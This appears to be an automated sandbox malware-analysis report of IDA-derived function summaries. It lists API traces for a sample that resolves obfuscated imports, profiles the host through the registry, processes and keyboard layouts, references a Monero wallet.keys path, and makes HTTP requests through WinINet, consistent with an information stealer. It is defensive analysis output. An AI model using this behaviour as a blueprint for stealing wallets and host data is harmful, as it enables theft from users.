StrCmpCA 15144->15147 15146 631590 lstrcpy 15145->15146 15148 640a49 15146->15148 15149 6407a8 15147->15149 15176 640843 15147->15176 16038 640250 15148->16038 15152 64a7a0 lstrcpy 15149->15152 15154 6407c3 15152->15154 15153 640865 StrCmpCA 15155 640874 15153->15155 15193 64096b 15153->15193 15156 631590 lstrcpy 15154->15156 15157 64a740 lstrcpy 15155->15157 15158 64080c 15156->15158 15160 640881 15157->15160 15161 64a7a0 lstrcpy 15158->15161 15159 64099c StrCmpCA 15162 6409ab 15159->15162 15182 640a2d 15159->15182 15163 64a9b0 4 API calls 15160->15163 15164 640823 15161->15164 15165 631590 lstrcpy 15162->15165 15166 6408ac 15163->15166 15167 64a7a0 lstrcpy 15164->15167 
15168 6409f4 15165->15168 15169 64a920 3 API calls 15166->15169 15170 64083e 15167->15170 15171 64a7a0 lstrcpy 15168->15171 15172 6408b3 15169->15172 15865 63fb00 15170->15865 15174 640a0d 15171->15174 15175 64a9b0 4 API calls 15172->15175 15177 64a7a0 lstrcpy 15174->15177 15178 6408ba 15175->15178 15176->15153 15179 640a28 15177->15179 15180 64a8a0 lstrcpy 15178->15180 15981 640030 15179->15981 15182->13573 15193->15159 15513 64a7a0 lstrcpy 15512->15513 15514 631683 15513->15514 15515 64a7a0 lstrcpy 15514->15515 15516 631695 15515->15516 15517 64a7a0 lstrcpy 15516->15517 15518 6316a7 15517->15518 15519 64a7a0 lstrcpy 15518->15519 15520 6315a3 15519->15520 15520->14396 15522 6347c6 15521->15522 15523 634838 lstrlen 15522->15523 15547 64aad0 15523->15547 15525 634848 InternetCrackUrlA 15526 634867 15525->15526 15526->14473 15528 64a740 lstrcpy 15527->15528 15529 648b74 15528->15529 15530 64a740 lstrcpy 15529->15530 15531 648b82 GetSystemTime 15530->15531 15534 648b99 15531->15534 15532 64a7a0 lstrcpy 15533 648bfc 15532->15533 15533->14488 15534->15532 15536 64a931 15535->15536 15537 64a988 15536->15537 15540 64a968 lstrcpy lstrcat 15536->15540 15538 64a7a0 lstrcpy 15537->15538 15539 64a994 15538->15539 15539->14491 15540->15537 15541->14606 15543 634eee 15542->15543 15544 639af9 LocalAlloc 15542->15544 15543->14494 15543->14496 15544->15543 15545 639b14 CryptStringToBinaryA 15544->15545 15545->15543 15546 639b39 LocalFree 15545->15546 15546->15543 15547->15525 15548->14616 15549->14757 15550->14759 15551->14767 15680 6477a0 15552->15680 15555 6476c6 RegOpenKeyExA 15557 647704 RegCloseKey 15555->15557 15558 6476e7 RegQueryValueExA 15555->15558 15556 641c1e 15556->14849 15557->15556 15558->15557 15560 641c99 15559->15560 15560->14863 15562 641e09 15561->15562 15562->14905 15564 641e84 15563->15564 15565 647a9a wsprintfA 15563->15565 15564->14919 15565->15564 15567 641efe 15566->15567 15568 647b4d 15566->15568 15567->14933 15687 648d20 LocalAlloc CharToOemW 
15568->15687 15571 64a740 lstrcpy 15570->15571 15572 647bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15571->15572 15579 647c25 15572->15579 15573 647c46 GetLocaleInfoA 15573->15579 15574 647d18 15575 647d1e LocalFree 15574->15575 15576 647d28 15574->15576 15575->15576 15578 64a7a0 lstrcpy 15576->15578 15577 64a9b0 lstrcpy lstrlen lstrcpy lstrcat 15577->15579 15581 647d37 15578->15581 15579->15573 15579->15574 15579->15577 15580 64a8a0 lstrcpy 15579->15580 15580->15579 15581->14946 15583 642008 15582->15583 15583->14961 15585 6494b5 15584->15585 15586 649493 GetModuleFileNameExA CloseHandle 15584->15586 15587 64a740 lstrcpy 15585->15587 15586->15585 15588 642091 15587->15588 15588->14976 15590 642119 15589->15590 15591 647e68 RegQueryValueExA 15589->15591 15590->14990 15592 647e8e RegCloseKey 15591->15592 15592->15590 15594 647fb9 GetLogicalProcessorInformationEx 15593->15594 15595 647fd8 GetLastError 15594->15595 15598 648029 15594->15598 15596 648022 15595->15596 15605 647fe3 15595->15605 15597 642194 15596->15597 15601 6489f0 2 API calls 15596->15601 15597->15004 15602 6489f0 2 API calls 15598->15602 15601->15597 15603 64807b 15602->15603 15603->15596 15604 648084 wsprintfA 15603->15604 15604->15597 15605->15594 15605->15597 15688 6489f0 15605->15688 15691 648a10 GetProcessHeap RtlAllocateHeap 15605->15691 15607 64220f 15606->15607 15607->15018 15609 6489b0 15608->15609 15610 64814d GlobalMemoryStatusEx 15609->15610 15613 648163 15610->15613 15611 64819b wsprintfA 15612 642289 15611->15612 15612->15032 15613->15611 15615 6487fb GetProcessHeap RtlAllocateHeap wsprintfA 15614->15615 15617 64a740 lstrcpy 15615->15617 15618 64230b 15617->15618 15618->15046 15620 64a740 lstrcpy 15619->15620 15624 648229 15620->15624 15621 648263 15623 64a7a0 lstrcpy 15621->15623 15622 64a9b0 lstrcpy lstrlen lstrcpy lstrcat 15622->15624 15625 6482dc 15623->15625 15624->15621 15624->15622 15626 64a8a0 lstrcpy 15624->15626 15625->15063 15626->15624 15628 64a740 lstrcpy 
15627->15628 15629 64835c RegOpenKeyExA 15628->15629 15630 6483d0 15629->15630 15631 6483ae 15629->15631 15633 648613 RegCloseKey 15630->15633 15634 6483f8 RegEnumKeyExA 15630->15634 15632 64a7a0 lstrcpy 15631->15632 15644 6483bd 15632->15644 15637 64a7a0 lstrcpy 15633->15637 15635 64860e 15634->15635 15636 64843f wsprintfA RegOpenKeyExA 15634->15636 15635->15633 15638 648485 RegCloseKey RegCloseKey 15636->15638 15639 6484c1 RegQueryValueExA 15636->15639 15637->15644 15640 64a7a0 lstrcpy 15638->15640 15641 648601 RegCloseKey 15639->15641 15642 6484fa lstrlen 15639->15642 15640->15644 15641->15635 15642->15641 15643 648510 15642->15643 15645 64a9b0 4 API calls 15643->15645 15644->15089 15646 648527 15645->15646 15647 64a8a0 lstrcpy 15646->15647 15648 648533 15647->15648 15649 64a9b0 4 API calls 15648->15649 15650 648557 15649->15650 15651 64a8a0 lstrcpy 15650->15651 15652 648563 15651->15652 15653 64856e RegQueryValueExA 15652->15653 15653->15641 15654 6485a3 15653->15654 15655 64a9b0 4 API calls 15654->15655 15656 6485ba 15655->15656 15657 64a8a0 lstrcpy 15656->15657 15658 6485c6 15657->15658 15659 64a9b0 4 API calls 15658->15659 15660 6485ea 15659->15660 15661 64a8a0 lstrcpy 15660->15661 15662 6485f6 15661->15662 15662->15641 15664 64a740 lstrcpy 15663->15664 15665 6486bc CreateToolhelp32Snapshot Process32First 15664->15665 15666 64875d CloseHandle 15665->15666 15667 6486e8 Process32Next 15665->15667 15668 64a7a0 lstrcpy 15666->15668 15667->15666 15672 6486fd 15667->15672 15671 648776 15668->15671 15669 64a9b0 lstrcpy lstrlen lstrcpy lstrcat 15669->15672 15670 64a8a0 lstrcpy 15670->15672 15671->15121 15672->15667 15672->15669 15672->15670 15674 64a7a0 lstrcpy 15673->15674 15675 6451b5 15674->15675 15676 631590 lstrcpy 15675->15676 15677 6451c6 15676->15677 15692 635100 15677->15692 15679 6451cf 15679->15133 15683 647720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15680->15683 15682 6476b9 15682->15555 15682->15556 15684 647765 RegQueryValueExA 15683->15684 15685 

                    Control-flow Graph

                    APIs
                    • GetProcAddress.KERNEL32(74DD0000,01443018), ref: 006498A1
                    • GetProcAddress.KERNEL32(74DD0000,01443210), ref: 006498BA
                    • GetProcAddress.KERNEL32(74DD0000,01443138), ref: 006498D2
                    • GetProcAddress.KERNEL32(74DD0000,01443180), ref: 006498EA
                    • GetProcAddress.KERNEL32(74DD0000,01443270), ref: 00649903
                    • GetProcAddress.KERNEL32(74DD0000,01449F18), ref: 0064991B
                    • GetProcAddress.KERNEL32(74DD0000,01435870), ref: 00649933
                    • GetProcAddress.KERNEL32(74DD0000,01435810), ref: 0064994C
                    • GetProcAddress.KERNEL32(74DD0000,01443240), ref: 00649964
                    • GetProcAddress.KERNEL32(74DD0000,01443078), ref: 0064997C
                    • GetProcAddress.KERNEL32(74DD0000,014431F8), ref: 00649995
                    • GetProcAddress.KERNEL32(74DD0000,01443288), ref: 006499AD
                    • GetProcAddress.KERNEL32(74DD0000,014358F0), ref: 006499C5
                    • GetProcAddress.KERNEL32(74DD0000,01443258), ref: 006499DE
                    • GetProcAddress.KERNEL32(74DD0000,01443198), ref: 006499F6
                    • GetProcAddress.KERNEL32(74DD0000,01435890), ref: 00649A0E
                    • GetProcAddress.KERNEL32(74DD0000,014432A0), ref: 00649A27
                    • GetProcAddress.KERNEL32(74DD0000,01443030), ref: 00649A3F
                    • GetProcAddress.KERNEL32(74DD0000,01435850), ref: 00649A57
                    • GetProcAddress.KERNEL32(74DD0000,01442FE8), ref: 00649A70
                    • GetProcAddress.KERNEL32(74DD0000,01435730), ref: 00649A88
                    • LoadLibraryA.KERNEL32(014430C0,?,00646A00), ref: 00649A9A
                    • LoadLibraryA.KERNEL32(01443060,?,00646A00), ref: 00649AAB
                    • LoadLibraryA.KERNEL32(014430D8,?,00646A00), ref: 00649ABD
                    • LoadLibraryA.KERNEL32(01443090,?,00646A00), ref: 00649ACF
                    • LoadLibraryA.KERNEL32(014431C8,?,00646A00), ref: 00649AE0
                    • GetProcAddress.KERNEL32(75A70000,01443108), ref: 00649B02
                    • GetProcAddress.KERNEL32(75290000,01443150), ref: 00649B23
                    • GetProcAddress.KERNEL32(75290000,014431B0), ref: 00649B3B
                    • GetProcAddress.KERNEL32(75BD0000,01443228), ref: 00649B5D
                    • GetProcAddress.KERNEL32(75450000,014356F0), ref: 00649B7E
                    • GetProcAddress.KERNEL32(76E90000,01449F08), ref: 00649B9F
                    • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00649BB6
                    Strings
                    • NtQueryInformationProcess, xrefs: 00649BAA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID: NtQueryInformationProcess
                    • API String ID: 2238633743-2781105232
                    • Opcode ID: 2c23c61fc6acc747dc8c45642a279fd177d22a83eb188ad24829d101bd85b7be
                    • Instruction ID: f96f7633abefbb04c5a01fd70d58a0d7d0ad93b319306f6a3c5f77c4ec750d29
                    • Opcode Fuzzy Hash: 2c23c61fc6acc747dc8c45642a279fd177d22a83eb188ad24829d101bd85b7be
                    • Instruction Fuzzy Hash: 3CA136B55142049FD34CEFA8ED8DA6A3BF9F7C8345704452AA65D8227CD639D8C2CB23

                    Control-flow Graph

                    APIs
                    • RtlAllocateHeap.NTDLL(00000000), ref: 0063460F
                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0063479C
                    Strings
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0063477B, 00634770, 00634643, 006345C7, 00634657, 00634662, 00634617, 0063462D, 00634678, 006346CD, 006346B7, 0063475A, 00634713, 00634638, 00634734, 0063473F, 006346AC, 006346D8, 006346C2, 00634729, 006345E8, 006345DD, 006345F3, 006345D2, 0063471E, 0063466D, 00634765, 00634683, 0063474F, 00634622
                    Yara matches
                    Similarity
                    • API ID: AllocateHeapProtectVirtual
                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (the same string repeated once per reference, joined with $)
                    • API String ID: 1542196881-2218711628
                    • Opcode ID: 507b00ae2132315e1227f5fd42cea0bfad8c516bad7ebbda474a681515b2a836
                    • Instruction ID: ace63dd0dd96f82aef2d688d9d7b89da72332155bebf3b33c9e42e2ff2148e53
                    • Opcode Fuzzy Hash: 507b00ae2132315e1227f5fd42cea0bfad8c516bad7ebbda474a681515b2a836
                    • Instruction Fuzzy Hash: 884123247C260C6ACE74BBA4885EEAD7767DF4B746F515240BC0152282CBF076AC8F26

                    Control-flow Graph

                    APIs
                      • Part of subcall function 0064A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0064A7E6
                      • Part of subcall function 006347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00634839
                      • Part of subcall function 006347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00634849
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00634915
                    • StrCmpCA.SHLWAPI(?,014507B0), ref: 0063493A
                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00634ABA
                    • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00650DDB,00000000,?,?,00000000,?,",00000000,?,01450600), ref: 00634DE8
                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00634E04
                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00634E18
                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00634E49
                    • InternetCloseHandle.WININET(00000000), ref: 00634EAD
                    • InternetCloseHandle.WININET(00000000), ref: 00634EC5
                    • HttpOpenRequestA.WININET(00000000,01450760,?,0144FDD8,00000000,00000000,00400100,00000000), ref: 00634B15
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                      • Part of subcall function 0064A920: lstrcpy.KERNEL32(00000000,?), ref: 0064A972
                      • Part of subcall function 0064A920: lstrcat.KERNEL32(00000000), ref: 0064A982
                    • InternetCloseHandle.WININET(00000000), ref: 00634ECF
                    Strings
                    Yara matches
                    Similarity
                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                    • String ID: "$"$------$------$------
                    • API String ID: 460715078-2180234286
                    • Opcode ID: 87510aacc9bcb67afc7845e3624e64b63989dc95c0b7947c24d4ebb08fcb2b0c
                    • Instruction ID: e76b1da6bf8dc359b18b1fea805a70fc40eb2620737c8070d62e6f2596d9eb9b
                    • Opcode Fuzzy Hash: 87510aacc9bcb67afc7845e3624e64b63989dc95c0b7947c24d4ebb08fcb2b0c
                    • Instruction Fuzzy Hash: 0112F972951118BAEB58EB90DC92FEEB33ABF55300F50419DB10662091EF706F49CF6A
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006311B7), ref: 00647880
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00647887
                    • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0064789F
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateNameProcessUser
                    • String ID:
                    • API String ID: 1296208442-0
                    • Opcode ID: c231deda2371d1bf1637c8e03044876dfc31978bf3df3461d29083163fa272de
                    • Instruction ID: d4c7e7b7f10c2eecb08ff4ac2bfa319c652a6149412537238abafc0662b29288
                    • Opcode Fuzzy Hash: c231deda2371d1bf1637c8e03044876dfc31978bf3df3461d29083163fa272de
                    • Instruction Fuzzy Hash: C8F04FB1D44208AFC714DF98DD4ABAEBBB8FB44711F10026AFA05A2680C77555448BA2
                    APIs
                    Yara matches
                    Similarity
                    • API ID: ExitInfoProcessSystem
                    • String ID:
                    • API String ID: 752954902-0
                    • Opcode ID: 4d277f8fab47840d91b3a464fecd47aa6f504a1683e47d2058fd4109d5b00082
                    • Instruction ID: 71474c03e4abb354d6985547a61f3e14403ed78f84a39a7cbfcc3a287a3ad20a
                    • Opcode Fuzzy Hash: 4d277f8fab47840d91b3a464fecd47aa6f504a1683e47d2058fd4109d5b00082
                    • Instruction Fuzzy Hash: 64D05E7490030CDBCB08DFE0D84D6DDBB78FB48312F000594D90962340EA3094C2CAA6

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    • Graph of function 649c10 (basic-block edge list not rendered here)
                    APIs
                    • GetProcAddress.KERNEL32(74DD0000,01435A30), ref: 00649C2D
                    • GetProcAddress.KERNEL32(74DD0000,014358B0), ref: 00649C45
                    • GetProcAddress.KERNEL32(74DD0000,0144A828), ref: 00649C5E
                    • GetProcAddress.KERNEL32(74DD0000,0144A858), ref: 00649C76
                    • GetProcAddress.KERNEL32(74DD0000,0144A870), ref: 00649C8E
                    • GetProcAddress.KERNEL32(74DD0000,0144A888), ref: 00649CA7
                    • GetProcAddress.KERNEL32(74DD0000,0143CD60), ref: 00649CBF
                    • GetProcAddress.KERNEL32(74DD0000,0144E198), ref: 00649CD7
                    • GetProcAddress.KERNEL32(74DD0000,0144E228), ref: 00649CF0
                    • GetProcAddress.KERNEL32(74DD0000,0144E078), ref: 00649D08
                    • GetProcAddress.KERNEL32(74DD0000,0144E108), ref: 00649D20
                    • GetProcAddress.KERNEL32(74DD0000,01435A50), ref: 00649D39
                    • GetProcAddress.KERNEL32(74DD0000,01435930), ref: 00649D51
                    • GetProcAddress.KERNEL32(74DD0000,01435830), ref: 00649D69
                    • GetProcAddress.KERNEL32(74DD0000,01435950), ref: 00649D82
                    • GetProcAddress.KERNEL32(74DD0000,0144E318), ref: 00649D9A
                    • GetProcAddress.KERNEL32(74DD0000,0144E240), ref: 00649DB2
                    • GetProcAddress.KERNEL32(74DD0000,0143CD88), ref: 00649DCB
                    • GetProcAddress.KERNEL32(74DD0000,014359B0), ref: 00649DE3
                    • GetProcAddress.KERNEL32(74DD0000,0144E1F8), ref: 00649DFB
                    • GetProcAddress.KERNEL32(74DD0000,0144E2D0), ref: 00649E14
                    • GetProcAddress.KERNEL32(74DD0000,0144E090), ref: 00649E2C
                    • GetProcAddress.KERNEL32(74DD0000,0144E1C8), ref: 00649E44
                    • GetProcAddress.KERNEL32(74DD0000,01435710), ref: 00649E5D
                    • GetProcAddress.KERNEL32(74DD0000,0144E0F0), ref: 00649E75
                    • GetProcAddress.KERNEL32(74DD0000,0144E138), ref: 00649E8D
                    • GetProcAddress.KERNEL32(74DD0000,0144E120), ref: 00649EA6
                    • GetProcAddress.KERNEL32(74DD0000,0144E150), ref: 00649EBE
                    • GetProcAddress.KERNEL32(74DD0000,0144E300), ref: 00649ED6
                    • GetProcAddress.KERNEL32(74DD0000,0144E258), ref: 00649EEF
                    • GetProcAddress.KERNEL32(74DD0000,0144E330), ref: 00649F07
                    • GetProcAddress.KERNEL32(74DD0000,0144E270), ref: 00649F1F
                    • GetProcAddress.KERNEL32(74DD0000,0144E0A8), ref: 00649F38
                    • GetProcAddress.KERNEL32(74DD0000,0144B8E0), ref: 00649F50
                    • GetProcAddress.KERNEL32(74DD0000,0144E348), ref: 00649F68
                    • GetProcAddress.KERNEL32(74DD0000,0144E0C0), ref: 00649F81
                    • GetProcAddress.KERNEL32(74DD0000,014357D0), ref: 00649F99
                    • GetProcAddress.KERNEL32(74DD0000,0144E180), ref: 00649FB1
                    • GetProcAddress.KERNEL32(74DD0000,014359D0), ref: 00649FCA
                    • GetProcAddress.KERNEL32(74DD0000,0144E288), ref: 00649FE2
                    • GetProcAddress.KERNEL32(74DD0000,0144E0D8), ref: 00649FFA
                    • GetProcAddress.KERNEL32(74DD0000,01435770), ref: 0064A013
                    • GetProcAddress.KERNEL32(74DD0000,01435B70), ref: 0064A02B
                    • LoadLibraryA.KERNEL32(0144E168,?,00645CA3,00650AEB,?,?,?,?,?,?,?,?,?,?,00650AEA,00650AE3), ref: 0064A03D
                    • LoadLibraryA.KERNEL32(0144E1E0,?,00645CA3,00650AEB,?,?,?,?,?,?,?,?,?,?,00650AEA,00650AE3), ref: 0064A04E
                    • LoadLibraryA.KERNEL32(0144E1B0,?,00645CA3,00650AEB,?,?,?,?,?,?,?,?,?,?,00650AEA,00650AE3), ref: 0064A060
                    • LoadLibraryA.KERNEL32(0144E360,?,00645CA3,00650AEB,?,?,?,?,?,?,?,?,?,?,00650AEA,00650AE3), ref: 0064A072
                    • LoadLibraryA.KERNEL32(0144E210,?,00645CA3,00650AEB,?,?,?,?,?,?,?,?,?,?,00650AEA,00650AE3), ref: 0064A083
                    • LoadLibraryA.KERNEL32(0144E2A0,?,00645CA3,00650AEB,?,?,?,?,?,?,?,?,?,?,00650AEA,00650AE3), ref: 0064A095
                    • LoadLibraryA.KERNEL32(0144E2B8,?,00645CA3,00650AEB,?,?,?,?,?,?,?,?,?,?,00650AEA,00650AE3), ref: 0064A0A7
                    • LoadLibraryA.KERNEL32(0144E2E8,?,00645CA3,00650AEB,?,?,?,?,?,?,?,?,?,?,00650AEA,00650AE3), ref: 0064A0B8
                    • GetProcAddress.KERNEL32(75290000,01435AF0), ref: 0064A0DA
                    • GetProcAddress.KERNEL32(75290000,0144E498), ref: 0064A0F2
                    • GetProcAddress.KERNEL32(75290000,0144A038), ref: 0064A10A
                    • GetProcAddress.KERNEL32(75290000,0144E450), ref: 0064A123
                    • GetProcAddress.KERNEL32(75290000,01435BD0), ref: 0064A13B
                    • GetProcAddress.KERNEL32(734C0000,0143C9F0), ref: 0064A160
                    • GetProcAddress.KERNEL32(734C0000,01435B30), ref: 0064A179
                    • GetProcAddress.KERNEL32(734C0000,0143C6A8), ref: 0064A191
                    • GetProcAddress.KERNEL32(734C0000,0144E390), ref: 0064A1A9
                    • GetProcAddress.KERNEL32(734C0000,0144E4F8), ref: 0064A1C2
                    • GetProcAddress.KERNEL32(734C0000,01435C10), ref: 0064A1DA
                    • GetProcAddress.KERNEL32(734C0000,01435C30), ref: 0064A1F2
                    • GetProcAddress.KERNEL32(734C0000,0144E3F0), ref: 0064A20B
                    • GetProcAddress.KERNEL32(752C0000,01435C50), ref: 0064A22C
                    • GetProcAddress.KERNEL32(752C0000,01435D90), ref: 0064A244
                    • GetProcAddress.KERNEL32(752C0000,0144E468), ref: 0064A25D
                    • GetProcAddress.KERNEL32(752C0000,0144E510), ref: 0064A275
                    • GetProcAddress.KERNEL32(752C0000,01435D10), ref: 0064A28D
                    • GetProcAddress.KERNEL32(74EC0000,0143C608), ref: 0064A2B3
                    • GetProcAddress.KERNEL32(74EC0000,0143C950), ref: 0064A2CB
                    • GetProcAddress.KERNEL32(74EC0000,0144E438), ref: 0064A2E3
                    • GetProcAddress.KERNEL32(74EC0000,01435D70), ref: 0064A2FC
                    • GetProcAddress.KERNEL32(74EC0000,01435C70), ref: 0064A314
                    • GetProcAddress.KERNEL32(74EC0000,0143CAB8), ref: 0064A32C
                    • GetProcAddress.KERNEL32(75BD0000,0144E408), ref: 0064A352
                    • GetProcAddress.KERNEL32(75BD0000,01435CB0), ref: 0064A36A
                    • GetProcAddress.KERNEL32(75BD0000,0144A048), ref: 0064A382
                    • GetProcAddress.KERNEL32(75BD0000,0144E378), ref: 0064A39B
                    • GetProcAddress.KERNEL32(75BD0000,0144E3A8), ref: 0064A3B3
                    • GetProcAddress.KERNEL32(75BD0000,01435DF0), ref: 0064A3CB
                    • GetProcAddress.KERNEL32(75BD0000,01435BF0), ref: 0064A3E4
                    • GetProcAddress.KERNEL32(75BD0000,0144E4B0), ref: 0064A3FC
                    • GetProcAddress.KERNEL32(75BD0000,0144E480), ref: 0064A414
                    • GetProcAddress.KERNEL32(75A70000,01435CD0), ref: 0064A436
                    • GetProcAddress.KERNEL32(75A70000,0144E4C8), ref: 0064A44E
                    • GetProcAddress.KERNEL32(75A70000,0144E528), ref: 0064A466
                    • GetProcAddress.KERNEL32(75A70000,0144E4E0), ref: 0064A47F
                    • GetProcAddress.KERNEL32(75A70000,0144E420), ref: 0064A497
                    • GetProcAddress.KERNEL32(75450000,01435B50), ref: 0064A4B8
                    • GetProcAddress.KERNEL32(75450000,01435B10), ref: 0064A4D1
                    • GetProcAddress.KERNEL32(75DA0000,01435B90), ref: 0064A4F2
                    • GetProcAddress.KERNEL32(75DA0000,0144E3C0), ref: 0064A50A
                    • GetProcAddress.KERNEL32(6F070000,01435C90), ref: 0064A530
                    • GetProcAddress.KERNEL32(6F070000,01435E10), ref: 0064A548
                    • GetProcAddress.KERNEL32(6F070000,01435BB0), ref: 0064A560
                    • GetProcAddress.KERNEL32(6F070000,0144E3D8), ref: 0064A579
                    • GetProcAddress.KERNEL32(6F070000,01435CF0), ref: 0064A591
                    • GetProcAddress.KERNEL32(6F070000,01435DB0), ref: 0064A5A9
                    • GetProcAddress.KERNEL32(6F070000,01435D30), ref: 0064A5C2
                    • GetProcAddress.KERNEL32(6F070000,01435D50), ref: 0064A5DA
                    • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0064A5F1
                    • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0064A607
                    • GetProcAddress.KERNEL32(75AF0000,0144DDD8), ref: 0064A629
                    • GetProcAddress.KERNEL32(75AF0000,0144A088), ref: 0064A641
                    • GetProcAddress.KERNEL32(75AF0000,0144E000), ref: 0064A659
                    • GetProcAddress.KERNEL32(75AF0000,0144E030), ref: 0064A672
                    • GetProcAddress.KERNEL32(75D90000,01435DD0), ref: 0064A693
                    • GetProcAddress.KERNEL32(6F9D0000,0144DE80), ref: 0064A6B4
                    • GetProcAddress.KERNEL32(6F9D0000,01435E30), ref: 0064A6CD
                    • GetProcAddress.KERNEL32(6F9D0000,0144E060), ref: 0064A6E5
                    • GetProcAddress.KERNEL32(6F9D0000,0144DD90), ref: 0064A6FD
                    Strings
                    Yara matches
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID: HttpQueryInfoA$InternetSetOptionA
                    • API String ID: 2238633743-1775429166
                    • Opcode ID: a78891b89af925621977f9d8b2c64f23764dba4c888e7f038d2c6f9df3b3fdba
                    • Instruction ID: e59b461554ecd30f97e51b8b3e09ec6393ed09eac91b197392a2ba03ca37d531
                    • Opcode Fuzzy Hash: a78891b89af925621977f9d8b2c64f23764dba4c888e7f038d2c6f9df3b3fdba
                    • Instruction Fuzzy Hash: 666228B5514200AFC34CDFA8ED8D96A3BF9F7C8641714852AA65D8327CD63AD8C1DB23

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    • Graph of function 636280 (basic-block edge list not rendered here)
                    APIs
                      • Part of subcall function 0064A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0064A7E6
                      • Part of subcall function 006347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00634839
                      • Part of subcall function 006347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00634849
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                    • InternetOpenA.WININET(00650DFE,00000001,00000000,00000000,00000000), ref: 006362E1
                    • StrCmpCA.SHLWAPI(?,014507B0), ref: 00636303
                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00636335
                    • HttpOpenRequestA.WININET(00000000,GET,?,0144FDD8,00000000,00000000,00400100,00000000), ref: 00636385
                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006363BF
                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006363D1
                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 006363FD
                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0063646D
                    • InternetCloseHandle.WININET(00000000), ref: 006364EF
                    • InternetCloseHandle.WININET(00000000), ref: 006364F9
                    • InternetCloseHandle.WININET(00000000), ref: 00636503
                    Strings
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                    • String ID: ERROR$ERROR$GET
                    • API String ID: 3749127164-2509457195
                    • Opcode ID: 8f0dfe6e6b7ecb01a50cdfe7ce6d92031c34d4c639524961f70541ad95e56e3d
                    • Instruction ID: a6bad5663ef487828e490befeeee449513f597f867fd296b2eda8e1a99b5af02
                    • Opcode Fuzzy Hash: 8f0dfe6e6b7ecb01a50cdfe7ce6d92031c34d4c639524961f70541ad95e56e3d
                    • Instruction Fuzzy Hash: 4B714171A40218BBEB24DFD0CC49BEE77B9FB44700F108158F50A6B195DBB4AA85CF91

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    • Graph of function 645510 (basic-block edge list not rendered here)
